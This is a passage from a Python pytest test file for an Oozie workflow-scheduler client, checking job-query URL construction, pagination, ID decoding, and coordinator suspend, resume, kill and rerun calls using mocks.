api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.running()) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING;status=RUNNINGWITHERROR;' 'status=SUSPENDED;status=SUSPENDEDWITHERROR&offset=1&len=5000') api._jobs_query( model.ArtifactType.Coordinator, user='john_doe', name='my_coordinator', status=model.CoordinatorStatus.running()) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe;name=my_coordinator;' 'status=RUNNING;status=RUNNINGWITHERROR;status=SUSPENDED;' 'status=SUSPENDEDWITHERROR&offset=1&len=5000') def test_jobs_query_bad_parameters(self, api): with pytest.raises(KeyError) as err: api._jobs_query(model.ArtifactType.CoordinatorAction) assert 'ArtifactType.CoordinatorAction' in str(err) with 
pytest.raises(KeyError) as err: api._jobs_query(model.ArtifactType.WorkflowAction) assert 'ArtifactType.WorkflowAction' in str(err) @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_workflow_pagination(self, _, api): mock_results = iter( [ { 'total': 5001, 'workflows': [{'id': '1-W'}, {'id': '2-W'}] }, { 'total': 5001, 'workflows': [{'id': '3-W'}] } ] ) with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda url: next(mock_results) result = api._jobs_query(model.ArtifactType.Workflow) assert len(result) == 3 mock_get.assert_any_call('jobs?jobtype=wf&offset=1&len=5000') mock_get.assert_any_call('jobs?jobtype=wf&offset=5001&len=5000') with pytest.raises(StopIteration): next(mock_results) @pytest.mark.parametrize('limit, expected_result_count, expected_queries', [ (0, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']), (2, 2, ['jobs?jobtype=coordinator&offset=1&len=2']), (6000, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']) ]) @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_coordinator_pagination(self, _, limit, expected_result_count, expected_queries, api): mock_results = iter( [ { 'total': 5001, 'coordinatorjobs': [{'coordJobId': '1-C'}, {'coordJobId': '2-C'}] }, { 'total': 5001, 'coordinatorjobs': [{'coordJobId': '3-C'}] } ] ) with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda url: next(mock_results) result = api._jobs_query(model.ArtifactType.Coordinator, limit=limit) assert len(result) == expected_result_count mock_get.assert_has_calls(mock.call(query) for query in expected_queries) @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_workflow_details(self, fill_in_details, api): mock_result = { 'total': 1, 'workflows': 
[{'id': '1-W'}] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Workflow, details=False) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') assert not fill_in_details.called api._jobs_query(model.ArtifactType.Workflow, details=True) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') assert fill_in_details.called @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_coordinator_details(self, fill_in_details, api): mock_result = { 'total': 1, 'coordinatorjobs': [{'coordJobId': '1-C'}] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Coordinator, details=False) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') assert not fill_in_details.called api._jobs_query(model.ArtifactType.Coordinator, details=True) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') assert fill_in_details.called def test_jobs_all_workflows(self, api, sample_workflow_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_workflows() mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user=None, limit=0) api.jobs_all_workflows(name='my_workflow') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=0) api.jobs_all_workflows(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user='john_doe', limit=0) api.jobs_all_workflows(name='my_workflow', user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=0) api.jobs_all_workflows(name='my_workflow', limit=10) mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=10) def 
test_jobs_all_active_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.active() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_active_workflows() mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses ) api.jobs_all_active_workflows(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_running_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_running_workflows() mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses ) api.jobs_all_running_workflows(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses ) def test_jobs_running_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_running_workflows('my_workflow') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, name='my_workflow', user=None, status=expected_statuses) api.jobs_running_workflows('my_workflow', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, name='my_workflow', user='john_doe', status=expected_statuses) def test_jobs_last_workflow_parameters(self, api, sample_workflow_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_last_workflow('my_workflow') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, 
limit=1) api.jobs_last_workflow('my_workflow', user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=1) def test_jobs_workflow_names_parameters(self, api): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [] api.jobs_workflow_names() mock_query.assert_called_with(model.ArtifactType.Workflow, user=None, details=False, limit=0) api.jobs_workflow_names(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, user='john_doe', details=False, limit=0) def test_jobs_all_coordinators(self, api, sample_coordinator_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name=None, user=None, limit=0 ) api.jobs_all_coordinators(name='my_coordinator') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=0 ) api.jobs_all_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name=None, user='john_doe', limit=0 ) api.jobs_all_coordinators(name='my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user='john_doe', limit=0) api.jobs_all_coordinators(name='my_coordinator', limit=1) mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=1) def test_jobs_all_active_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.active() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_active_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses ) 
api.jobs_all_active_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_running_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_running_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses ) api.jobs_all_running_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_suspended_coordinators(self, api, sample_coordinator_suspended): expected_statuses = model.CoordinatorStatus.suspended() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_suspended] api.jobs_all_suspended_coordinators() mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, status=expected_statuses) api.jobs_all_suspended_coordinators(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', status=expected_statuses) def test_jobs_running_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_running_coordinators('my_coordinator') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user=None, status=expected_statuses) api.jobs_running_coordinators('my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user='john_doe', status=expected_statuses) def test_jobs_last_coordinator_parameters(self, api, sample_coordinator_running): with 
mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_last_coordinator('my_coordinator') mock_query.assert_called_with(model.ArtifactType.Coordinator, name='my_coordinator', user=None, limit=1) api.jobs_last_coordinator('my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user='john_doe', limit=1) def test_jobs_coordinator_names_parameters(self, api): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [] api.jobs_coordinator_names() mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, details=False) api.jobs_coordinator_names(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', details=False) class TestOozieClientJobCoordinatorQuery(object): def test_coordinator_query_parameters(self, api): mock_coord = { 'total': 0, 'coordJobId': SAMPLE_COORD_ID, 'actions': [] } mock_action = { 'id': SAMPLE_COORD_ACTION, } with mock.patch.object(api, '_get') as mock_get: def dummy_get(url): if url.startswith('job/' + SAMPLE_COORD_ID + '?'): return mock_coord elif url.startswith('job/' + SAMPLE_COORD_ID + '@'): return mock_action assert False, 'Unexpected URL' mock_get.side_effect = dummy_get with pytest.raises(ValueError) as err: api._coordinator_query('foo') assert 'Unrecognized job ID' in str(err) assert not mock_get.called api._coordinator_query(SAMPLE_COORD_ID) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1') mock_get.reset_mock() with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ID + '@foo') assert 'Unrecognized job ID' in str(err) assert not mock_get.called api._coordinator_query(SAMPLE_COORD_ACTION) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=12&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ACTION) mock_get.reset_mock() api._coordinator_query(SAMPLE_COORD_ID, 
status=model.CoordinatorActionStatus.RUNNING) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING') mock_get.reset_mock() api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.running()) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING;status=SUSPENDED') mock_get.reset_mock() with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, status=model.CoordinatorActionStatus.RUNNING) assert 'Cannot supply both coordinator action ID and status' in str(err) assert not mock_get.called def test_coordinator_query_limits(self, api): mock_result = { 'total': 100, 'coordJobId': SAMPLE_COORD_ID, 'actions': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, start=1) assert 'Cannot supply both coordinator action ID and start / limit' in str(err) with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, limit=10) assert 'Cannot supply both coordinator action ID and start / limit' in str(err) api._coordinator_query(SAMPLE_COORD_ID) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=100') api._coordinator_query(SAMPLE_COORD_ID, start=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=91') api._coordinator_query(SAMPLE_COORD_ID, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?order=desc&offset=1&len=10') api._coordinator_query(SAMPLE_COORD_ID, start=10, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10') api._coordinator_query(SAMPLE_COORD_ID, start=99, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=99&len=10') api._coordinator_query(SAMPLE_COORD_ID, 
status=model.CoordinatorActionStatus.RUNNING, start=10, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10&filter=status=RUNNING') def test_coordinator_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._coordinator_query(SAMPLE_COORD_ID) assert "Coordinator '" + SAMPLE_COORD_ID + "' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_coordinator_action_query(self, api): mock_result = { 'id': SAMPLE_COORD_ACTION, } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result mock_coord = mock.Mock() mock_coord.actions = {} action = api._coordinator_action_query(SAMPLE_COORD_ID, 12, coordinator=mock_coord) mock_get.assert_called_with('job/' + SAMPLE_COORD_ACTION) assert action._parent == mock_coord def test_coordinator_action_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._coordinator_action_query(SAMPLE_COORD_ID, 12) assert "Coordinator action '" + SAMPLE_COORD_ID + "@12' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_decode_coord_id(self, api, sample_coordinator_running): with mock.patch.object(api, 'jobs_last_coordinator') as mock_last: mock_last.return_value = mock.Mock(coordJobId=SAMPLE_COORD_ID) with pytest.raises(ValueError) as err: api._decode_coord_id() assert 'Supply exactly one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, name='my_coordinator') assert 'Supply exactly one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, user='john_doe') assert 
'User parameter not supported with coordinator_id' in str(err) result = api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID) assert result == SAMPLE_COORD_ID result = api._decode_coord_id(name='my_coordinator') assert result == SAMPLE_COORD_ID mock_last.assert_called_with(name='my_coordinator', user=None) result = api._decode_coord_id(name='my_coordinator', user='john_doe') assert result == SAMPLE_COORD_ID mock_last.assert_called_with(name='my_coordinator', user='john_doe') mock_last.return_value = None with pytest.raises(exceptions.OozieException) as err: api._decode_coord_id(name='my_coordinator') assert "Coordinator 'my_coordinator' not found" in str(err) result = api._decode_coord_id(coordinator=sample_coordinator_running) assert result == SAMPLE_COORD_ID with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, coordinator=sample_coordinator_running) assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(name='my_coordinator', coordinator=sample_coordinator_running) assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator=sample_coordinator_running, user='john_doe') assert 'User parameter not supported with coordinator object' in str(err) def test_job_coordinator_info(self, api): with mock.patch.object(api, '_coordinator_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(name='my_coordinator', 
user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe') mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID, limit=10) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=10) def test_job_last_coordinator_info(self, api): with mock.patch.object(api, '_coordinator_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_last_coordinator_info(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) api.job_last_coordinator_info(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) api.job_last_coordinator_info(name='my_coordinator', user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe') mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) def test_job_coordinator_action(self, api): with mock.patch.object(api, '_coordinator_action_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_action(SAMPLE_COORD_ACTION) mock_decode.assert_called_with(SAMPLE_COORD_ACTION, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(SAMPLE_COORD_ID, action_number=12) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(name='my_coordinator', action_number=12) mock_decode.assert_called_with(None, 'my_coordinator', None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(name='my_coordinator', user='john_doe', action_number=12) 
mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) with pytest.raises(ValueError) as err: api.job_coordinator_action(SAMPLE_COORD_ACTION, action_number=12) assert 'Supply exactly one of coordinator_id or action_number' in str(err) with pytest.raises(ValueError) as err: api.job_coordinator_action(name='my_coordinator') assert 'No action_number supplied' in str(err) def test_job_coordinator_all_active_actions(self, api, sample_coordinator_running, sample_coordinator_action_running): with mock.patch.object(api, '_coordinator_query') as mock_query: mock_query.return_value = sample_coordinator_action_running.parent() with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_all_active_actions(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) api.job_coordinator_all_active_actions(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) api.job_coordinator_all_active_actions(name='my_coordinator', user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) sample_coordinator = copy.copy(sample_coordinator_running) sample_coordinator.actions = None api.job_coordinator_all_active_actions(coordinator=sample_coordinator) mock_decode.assert_called_with(None, None, None, sample_coordinator) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) assert sample_coordinator.actions assert sample_coordinator.actions[12] == sample_coordinator_action_running class 
TestOozieClientJobWorkflowQuery(object): def test_workflow_query_parameters(self, api): mock_result = { 'total': 0, 'id': SAMPLE_WF_ID, 'actions': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result with pytest.raises(ValueError) as err: api._workflow_query('foo') assert 'Unrecognized job ID' in str(err) api._workflow_query(SAMPLE_WF_ID) mock_get.assert_called_with('job/' + SAMPLE_WF_ID) api._workflow_query(SAMPLE_WF_ACTION) mock_get.assert_called_with('job/' + SAMPLE_WF_ID) def test_workflow_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._workflow_query(SAMPLE_WF_ID) assert "Workflow '" + SAMPLE_WF_ID + "' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_decode_wf_id(self, api): with mock.patch.object(api, 'jobs_last_workflow') as mock_last: mock_last.return_value = mock.Mock(id=SAMPLE_WF_ID) with pytest.raises(ValueError) as err: api._decode_wf_id() assert 'Supply exactly one of workflow_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_wf_id(workflow_id=SAMPLE_WF_ID, name='my_workflow') assert 'Supply exactly one of workflow_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_wf_id(workflow_id=SAMPLE_WF_ID, user='john_doe') assert 'User parameter not supported with workflow_id' in str(err) result = api._decode_wf_id(workflow_id=SAMPLE_WF_ID) assert result == SAMPLE_WF_ID result = api._decode_wf_id(name='my_workflow') assert result == SAMPLE_WF_ID mock_last.assert_called_with(name='my_workflow', user=None) result = api._decode_wf_id(name='my_workflow', user='john_doe') assert result == SAMPLE_WF_ID mock_last.assert_called_with(name='my_workflow', user='john_doe') mock_last.return_value = None with pytest.raises(exceptions.OozieException) as err: 
api._decode_wf_id(name='my_workflow') assert "Workflow 'my_workflow' not found" in str(err) def test_job_workflow_info(self, api): with mock.patch.object(api, '_workflow_query') as mock_query: with mock.patch.object(api, '_decode_wf_id') as mock_decode: mock_decode.return_value = SAMPLE_WF_ID api.job_workflow_info(workflow_id=SAMPLE_WF_ID) mock_decode.assert_called_with(SAMPLE_WF_ID, None, None) mock_query.assert_called_with(SAMPLE_WF_ID) api.job_workflow_info(name='my_workflow') mock_decode.assert_called_with(None, 'my_workflow', None) mock_query.assert_called_with(SAMPLE_WF_ID) api.job_workflow_info(name='my_workflow', user='john_doe') mock_decode.assert_called_with(None, 'my_workflow', 'john_doe') mock_query.assert_called_with(SAMPLE_WF_ID) class TestOozieClientJobQuery(object): def test_job_info(self, api): with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info: with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info: api.job_info(SAMPLE_COORD_ID) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_info(SAMPLE_COORD_ACTION) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_info(SAMPLE_WF_ID) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert not mock_coord_info.called mock_workflow_info.reset_mock() api.job_info(SAMPLE_WF_ACTION) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION) assert not mock_coord_info.called mock_workflow_info.reset_mock() with pytest.raises(exceptions.OozieException) as err: api.job_info("wat?") assert "'wat?' 
does not match any known job" in str(err) assert not mock_coord_info.called assert not mock_workflow_info.called def test_job_action_info(self, api): with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info: with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info: api.job_action_info(SAMPLE_COORD_ID) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert not mock_coord_info.action.called assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_action_info(SAMPLE_COORD_ACTION) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION) mock_coord_info().action.assert_called_with(12) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_action_info(SAMPLE_WF_ID) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert not mock_workflow_info.action.called assert not mock_coord_info.called mock_workflow_info.reset_mock() api.job_action_info(SAMPLE_WF_ACTION) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION) mock_workflow_info().action.assert_called_with('foo') assert not mock_coord_info.called mock_workflow_info.reset_mock() with pytest.raises(exceptions.OozieException) as err: api.job_action_info("wat?") assert "'wat?' 
does not match any known job" in str(err) assert not mock_coord_info.called assert not mock_workflow_info.called class TestOozieClientJobCoordinatorManage(object): def test_fetch_coordinator_or_action(self, api, sample_coordinator_running, sample_coordinator_action_running): with mock.patch.object(api, '_decode_coord_id') as mock_decode: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_decode.return_value = SAMPLE_COORD_ID mock_info.return_value = sample_coordinator_running result = api._fetch_coordinator_or_action(SAMPLE_COORD_ID) assert result == sample_coordinator_running assert mock_decode.called assert mock_info.called with mock.patch.object(api, '_decode_coord_id') as mock_decode: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_decode.return_value = SAMPLE_COORD_ACTION mock_info.return_value = sample_coordinator_action_running.coordinator() result = api._fetch_coordinator_or_action(SAMPLE_COORD_ACTION) assert result == sample_coordinator_action_running assert mock_decode.called assert mock_info.called def test_job_coordinator_suspend_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running assert api.job_coordinator_suspend(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_coordinator_suspended assert not api.job_coordinator_suspend(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_suspend_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_running assert 
api.job_coordinator_suspend(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_suspended assert not api.job_coordinator_suspend(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_resume_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_suspended assert api.job_coordinator_resume(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_coordinator_running assert not api.job_coordinator_resume(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_resume_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_suspended assert api.job_coordinator_resume(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_running assert not api.job_coordinator_resume(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_kill_coordinator(self, api, sample_coordinator_running, sample_coordinator_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running assert api.job_coordinator_kill(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill') mock_put.reset_mock() mock_info.return_value = 
sample_coordinator_killed assert not api.job_coordinator_kill(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_kill_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_running assert api.job_coordinator_kill(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_killed assert not api.job_coordinator_kill(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_rerun(self, api, sample_coordinator_action_running, sample_coordinator_action_killed, sample_coordinator_action_killed_with_killed_coordinator): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_killed assert api.job_coordinator_rerun(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=coord-rerun&type=action&scope=12&refresh=true') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_killed_with_killed_coordinator assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_running assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_rerun_only_supports_actions(self, api, sample_coordinator_running): with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running with pytest.raises(ValueError) as value_error: api.job_coordinator_rerun(SAMPLE_COORD_ID) assert str(value_error.value) == 'Rerun only supports 
